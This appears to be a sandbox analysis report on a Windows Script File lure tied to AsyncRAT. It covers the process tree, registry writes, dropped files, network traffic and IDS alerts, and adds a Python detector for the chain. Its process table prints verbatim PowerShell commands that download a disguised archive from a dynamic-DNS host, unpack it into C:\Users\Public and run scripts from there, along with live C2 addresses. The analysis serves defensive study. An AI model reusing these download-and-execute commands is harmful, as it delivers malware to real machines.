| Field | Value |
|---|---|
| File name | StatementNumber#vfnwfrsysl.wsf |
| Full analysis | https://app.any.run/tasks/24494137-79d6-47f1-ab50-16844ecab24b |
| Verdict | Malicious activity |
| Threats | AsyncRAT, a remote access trojan that monitors and remotely controls infected systems. It was published on GitHub as open-source remote administration software, but threat actors abuse it for its extensive remote-control and surveillance features. |
| Analysis date | February 12, 2024, 17:26:15 |
| OS | Windows 10 Professional (build 19044, 64-bit) |
| Tags | |
| Indicators | |
| MIME | text/plain |
| File info | Unicode text, UTF-8 text, with very long lines (4923) |
| MD5 | 41895B624BC77C2921E6E1BEBE1B6CED |
| SHA1 | E920FB9EC50C2EC43591BD2D8C99B6E6D70270B5 |
| SHA256 | C5C76A901DFE2FE33A01F3D1E3B3F82C99A5B0E4898E1B78B76AC6E7A48E5419 |
| SSDEEP | 384:UIvIvIvIvIvIvIvIvIvIvIvIgIvIvIvIvIvIvIvIvIvIvIvIrIvIvIvIvIvIvIvr:Q |

The sample is a Windows Script File (.wsf) named to look like an account statement. `file` reports a single 4923-character line, and the ssdeep hash is one short chunk repeated over and over, which means most of the file is the same bytes repeated: padding or obfuscation filler rather than plain script text.
All listed processes ran as user `admin` at integrity level MEDIUM, and every image is a Microsoft Corporation binary.

| PID | Parent | Command line | Image path | Description | Version | Exit code | Indicators |
|---|---|---|---|---|---|---|---|
| 5924 | explorer.exe | `"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\StatementNumber#vfnwfrsysl.wsf"` | C:\Windows\System32\wscript.exe | Microsoft ® Windows Based Script Host | 5.812.10240.16384 | 0 | |
| 3888 | wscript.exe | `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://newhost.dyndns.info/f.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows PowerShell | 10.0.19041.1 (WinBuild.160101.0800) | 0 | — |
| 5808 | powershell.exe | `\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1` | C:\Windows\System32\conhost.exe | Console Window Host | 10.0.19041.1 (WinBuild.160101.0800) | 0 | — |
| 4540 | wscript.exe | `"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\basta.vbs"` | C:\Windows\System32\wscript.exe | Microsoft ® Windows Based Script Host | 5.812.10240.16384 | 0 | — |
| 504 | wscript.exe | `"C:\Windows\System32\net.exe" session` | C:\Windows\System32\net.exe | Net Command | 10.0.19041.1 (WinBuild.160101.0800) | 2 | — |
| 848 | net.exe | `\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1` | C:\Windows\System32\conhost.exe | Console Window Host | 10.0.19041.1 (WinBuild.160101.0800) | 0 | — |
| 3928 | net.exe | `C:\WINDOWS\system32\net1 session` | C:\Windows\System32\net1.exe | Net Command | 10.0.19041.844 (WinBuild.160101.0800) | 2 | — |
| 1040 | wscript.exe | `C:\WINDOWS\system32\cmd.exe /c ""C:\Users\Public\node.bat" "` | C:\Windows\System32\cmd.exe | Windows Command Processor | 10.0.19041.1 (WinBuild.160101.0800) | 0 | — |
| 3116 | cmd.exe | `\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1` | C:\Windows\System32\conhost.exe | Console Window Host | 10.0.19041.1 (WinBuild.160101.0800) | 0 | — |
| 5928 | cmd.exe | `PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows PowerShell | 10.0.19041.1 (WinBuild.160101.0800) | 1 | — |

Execution chain as recorded: the .wsf (5924) launches PowerShell (3888), which uses the BITS client cmdlet to fetch `f.jpg` from a dynamic-DNS host, saves it as `ben.zip` and extracts it into `C:\Users\Public` with `-Force`. The extracted content is then run by wscript.exe as `basta.vbs` (4540). `net session` (504/3928) exits non-zero (code 2 here), which is what that command does when the token is not elevated, so it reads as an is-admin check. `node.bat` (1040) launches a second PowerShell (5928) that tries to pull a Node.js 6.17.1 binary into `C:\Users\Public`; it exited with code 1 and no `node.exe` appears among the dropped files. Note that `Start-BitsTransfer` hands the request to the BITS service, so the GET for `f.jpg` is logged under svchost.exe (PID 2420) in the network section, not under powershell.exe; detections keyed on network activity from powershell.exe will miss it, while the command line is fully visible at process creation.
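As an added example, not part of the ANY.RUN report, the following Python replays the process table above as constructed Sysmon-style process-creation records and flags the behaviours that make this chain suspicious: a script host spawning a shell, `Start-BitsTransfer` fetching from a dynamic-DNS host with an image extension that is saved as an archive, extraction into `C:\Users\Public`, scripts run out of that directory, and the `net session` elevation probe. The record layout, the rule names, the dynamic-DNS marker list, explorer.exe's PID (set to 1234) and the parent PIDs below the first level are assumptions; the report names only the parent image, not its PID.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:            # layout is an assumption of this example; map Sysmon Event ID 1 /
    pid: int                # EDR fields (ProcessId, ParentProcessId, Image, CommandLine) onto it
    ppid: int
    image: str
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_RUNNERS = SCRIPT_HOSTS | {"cmd.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ico"}
DYNDNS_MARKERS = ("dyndns.", "no-ip.", "duckdns.")      # illustrative list, not exhaustive
PUBLIC_DIR = "c:\\users\\public\\"
_BITS_SRC = re.compile(r"-Source\s+'([^']+)'", re.I)
_BITS_DST = re.compile(r"-Destination\s+'([^']+)'", re.I)       # Start-BitsTransfer
_XARC_DST = re.compile(r"-DestinationPath\s+'([^']+)'", re.I)   # Expand-Archive
_PUBLIC_SCRIPT = re.compile(r"c:\\users\\public\\[^\s'\"]+\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1|exe|dll)", re.I)

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def ext(path):
    name = basename(path.split("?", 1)[0])
    return name[name.rfind("."):] if "." in name else ""

def host_of(url):
    m = re.match(r"https?://([^/:]+)", url, re.I)
    return m.group(1).lower() if m else ""

def ancestry(events, pid):
    """Image names from the root of the tree down to pid."""
    by_pid = {e.pid: e for e in events}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names[::-1]

def analyze(events):
    """Return a list of {pid, rule, detail} findings over the process-creation records."""
    by_pid = {e.pid: e for e in events}
    findings = []
    def hit(e, rule, detail):
        findings.append({"pid": e.pid, "rule": rule, "detail": detail})
    for e in events:
        img, low = basename(e.image), e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        # The pivot from lure to loader: a script host launching a shell.
        if pimg in SCRIPT_HOSTS and img in SHELLS:
            hit(e, "script_host_spawns_shell", f"{pimg} -> {img}")
        # Start-BitsTransfer: the GET itself is made by the BITS service (svchost.exe),
        # so the PowerShell command line is where the download is visible.
        if "start-bitstransfer" in low:
            src, dst = _BITS_SRC.search(e.cmdline), _BITS_DST.search(e.cmdline)
            if src and any(m in host_of(src.group(1)) for m in DYNDNS_MARKERS):
                hit(e, "bits_download_dynamic_dns", host_of(src.group(1)))
            if src and dst:
                if ext(src.group(1)) in IMAGE_EXT and ext(dst.group(1)) not in IMAGE_EXT:
                    hit(e, "download_extension_mismatch",
                        f"{ext(src.group(1))} saved as {ext(dst.group(1))}")
                if dst.group(1).lower().startswith(PUBLIC_DIR):
                    hit(e, "payload_staged_in_public", dst.group(1))
        xd = _XARC_DST.search(e.cmdline)
        if "expand-archive" in low and xd and xd.group(1).lower().startswith(PUBLIC_DIR):
            hit(e, "archive_extracted_to_public", xd.group(1))
        # Scripts and batch files run straight out of the user-writable Public folder.
        ps = _PUBLIC_SCRIPT.search(e.cmdline)
        if img in SCRIPT_RUNNERS and ps:
            hit(e, "execution_from_public_dir", ps.group(0))
        # `net session` fails unless the token is elevated; scripts use it as an is-admin probe.
        if img == "net.exe" and "session" in low and pimg in SCRIPT_HOSTS:
            hit(e, "admin_token_probe_from_script", e.cmdline)
    return findings

def rules_by_pid(findings):
    out = {}
    for f in findings:
        out.setdefault(f["pid"], set()).add(f["rule"])
    return out

# Constructed from the process table in the report. conhost.exe rows are omitted; explorer.exe's PID
# and the parent PIDs below the first level are assumptions (the report names only the parent image).
EXPLORER_PID = 1234
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(EXPLORER_PID, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5924, EXPLORER_PID, r"C:\Windows\System32\wscript.exe",
              r'"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\StatementNumber#vfnwfrsysl.wsf"'),
    ProcEvent(3888, 5924, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://newhost.dyndns.info/f.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force'''),
    ProcEvent(4540, 5924, r"C:\Windows\System32\wscript.exe", r'"C:\WINDOWS\System32\WScript.exe" "C:\Users\Public\basta.vbs"'),
    ProcEvent(504, 4540, r"C:\Windows\System32\net.exe", r'"C:\Windows\System32\net.exe" session'),
    ProcEvent(3928, 504, r"C:\Windows\System32\net1.exe", r"C:\WINDOWS\system32\net1 session"),
    ProcEvent(1040, 4540, r"C:\Windows\System32\cmd.exe", r'C:\WINDOWS\system32\cmd.exe /c ""C:\Users\Public\node.bat" "'),
    ProcEvent(5928, 1040, PS, r'''PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"'''),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['pid']:>5}  {f['rule']:<30} {f['detail']}")
    print(" -> ".join(ancestry(SAMPLE_EVENTS, 5928)))
```

Run against the constructed records, PID 3888 alone trips five rules and PID 5924 (the original .wsf) trips none: the lure itself looks like any double-clicked script, and the signal is in its children. The second PowerShell (5928) is flagged only for staging into `C:\Users\Public`, since nodejs.org is a legitimate host and the extensions agree, which is why the ancestry walk back to the wscript.exe parents matters for triage.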
| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | write | CachePrefix | (empty) |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | write | CachePrefix | Cookie: |
| 5924 | wscript.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | write | CachePrefix | Visited: |
| 3888 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
| 3888 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
| 3888 | powershell.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |

These ZoneMap and `5.0\Cache` writes are the values WinINet initialises the first time a process makes an HTTP request through it. They confirm that both the .wsf script host and the PowerShell child went on the network, but they are not a persistence mechanism and should not be treated as an indicator on their own. No Run key, scheduled task or service registration appears in this run.
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_are4b00l.adn.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aow4hdg3.xxx.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ylofaa.rug.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 5924 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\D9H4GX35\g4[1].txt | text | 8471B9F9D9E51433F25D31823A43A59C | 14B1DD86E80AD1148017CDA4DCDAF6CD03CC3487722FA1EE1C36C4B54AC425B1 |
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ecocbi04.mox.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04hjhqen.haw.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 3888 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uluwfezl.rok.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 3888 | powershell.exe | C:\Users\Public\method.dll | text | 38B97710070DBDD7B3359C0D52DA4A72 | 675F06AF4E7F254D55AC605BBD7DA45D9E00207A97F8A8AB7BB747D512776BC7 |
| 3888 | powershell.exe | C:\Users\Public\msg.dll | text | A4BFB12DBF9DA83178AE54E82BA3A432 | 27D5BD8CB077905BE7AB576F344C27F140B5585EF471F68638A8791C07FDA0CE |
| 3888 | powershell.exe | C:\Users\Public\load.dll | text | F19DBF2EDB3A0BD74B0524D960FF21EB | 8A6BDB6B18DA586FE7F2ACBD8F1055533F2CD97A3681B3652BCD712224DF45C3 |

The `__PSScriptPolicyTest_*` files all share one hash; PowerShell writes them at start-up to test whether script enforcement policy applies, and they are benign artefacts of PowerShell running, not of the malware. `g4[1].txt` is the IE cache copy of `http://37.1.214.209/g4.txt`, which wscript.exe (5924) fetched directly from the IP (see the HTTP table). `method.dll`, `msg.dll` and `load.dll` are what PowerShell (3888) unpacked from `ben.zip` into `C:\Users\Public`; despite the extension the sandbox types them as text rather than PE, so they are not loadable DLLs as-is, and together with `basta.vbs` and `node.bat` (executed from the same directory but not listed here) they are the artefacts to retrieve for follow-on analysis.
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2420 | svchost.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 KB | unknown |
| 5924 | wscript.exe | GET | 200 | 37.1.214.209:80 | http://37.1.214.209/g4.txt | unknown | text | 546 B | unknown |
| 2420 | svchost.exe | HEAD | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | — | — | unknown |
| 5476 | msedge.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 KB | unknown |
| 5476 | msedge.exe | GET | 204 | 13.107.6.158:80 | http://edge-http.microsoft.com/captiveportal/generate_204 | unknown | — | — | unknown |
| 6244 | curl.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/f.jpg | unknown | compressed | 223 KB | unknown |
| 5476 | msedge.exe | GET | 200 | 37.1.214.209:80 | http://newhost.dyndns.info/favicon.ico | unknown | image | 30.1 KB | unknown |
| 4128 | CompatTelRunner.exe | GET | 200 | 2.18.97.123:80 | http://www.microsoft.com/pkiops/crl/MicWinProPCA2011_2011-10-19.crl | unknown | binary | 564 B | unknown |
| 2592 | wermgr.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.01 KB | unknown |
| 4128 | CompatTelRunner.exe | GET | 200 | 88.221.110.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | binary | 824 B | unknown |

`f.jpg` is served as compressed content of 223 KB, not an image: it is the archive that PID 3888 writes as `ben.zip`, and the HEAD plus GET from svchost.exe (2420) are the BITS job created by `Start-BitsTransfer`. The `.jpg` name is there to pass casual URL filtering; the content type and the subsequent `Expand-Archive` give it away. wscript.exe (5924) separately retrieved `g4.txt` (546 bytes) straight from the IP address without DNS. The msedge.exe (5476) and curl.exe (6244) downloads of `f.jpg`, and the CRL fetches by CompatTelRunner.exe and wermgr.exe, do not belong to the sample's process tree and should not be attributed to it. There is no HTTP record for the nodejs.org download; only a connection to nodejs.org:443 from svchost.exe (2420) appears in the connection table, and the PowerShell that requested it (5928) exited with code 1.
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5924 | wscript.exe | 37.1.214.209:80 | newhost.dyndns.info | HVC-AS | US | unknown |
2592 | wermgr.exe | 52.182.143.212:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2592 | wermgr.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
3012 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
2592 | wermgr.exe | 23.218.209.163:80 | www.microsoft.com | AKAMAI-AS | DE | unknown |
2592 | wermgr.exe | 20.189.173.20:443 | umwatson.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2420 | svchost.exe | 37.1.214.209:80 | newhost.dyndns.info | HVC-AS | US | unknown |
2420 | svchost.exe | 104.20.23.46:443 | nodejs.org | CLOUDFLARENET | — | shared |
2592 | wermgr.exe | 20.42.65.92:443 | umwatson.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
| Domain | IP | Reputation |
|---|---|---|
| crl.microsoft.com | | whitelisted |
| www.microsoft.com | | whitelisted |
| umwatson.events.data.microsoft.com | | whitelisted |
| newhost.dyndns.info | | unknown |
| nodejs.org | | whitelisted |
| self.events.data.microsoft.com | | whitelisted |
| ntp.msn.com | | whitelisted |
| config.edge.skype.com | | whitelisted |
| edge-http.microsoft.com | | whitelisted |
| edge.microsoft.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
5924 | wscript.exe | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.dyndns .info Domain |
— | — | Misc activity | AV INFO DYNAMIC_DNS Query to *.dyndns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.dyndns. Domain |
2420 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns.* domain |
2420 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns .info Domain |
2420 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns .info Domain |
2420 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS HTTP Request to a *.dyndns.* domain |
— | — | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.dyndns .info Domain |
— | — | Misc activity | AV INFO DYNAMIC_DNS Query to *.dyndns. Domain |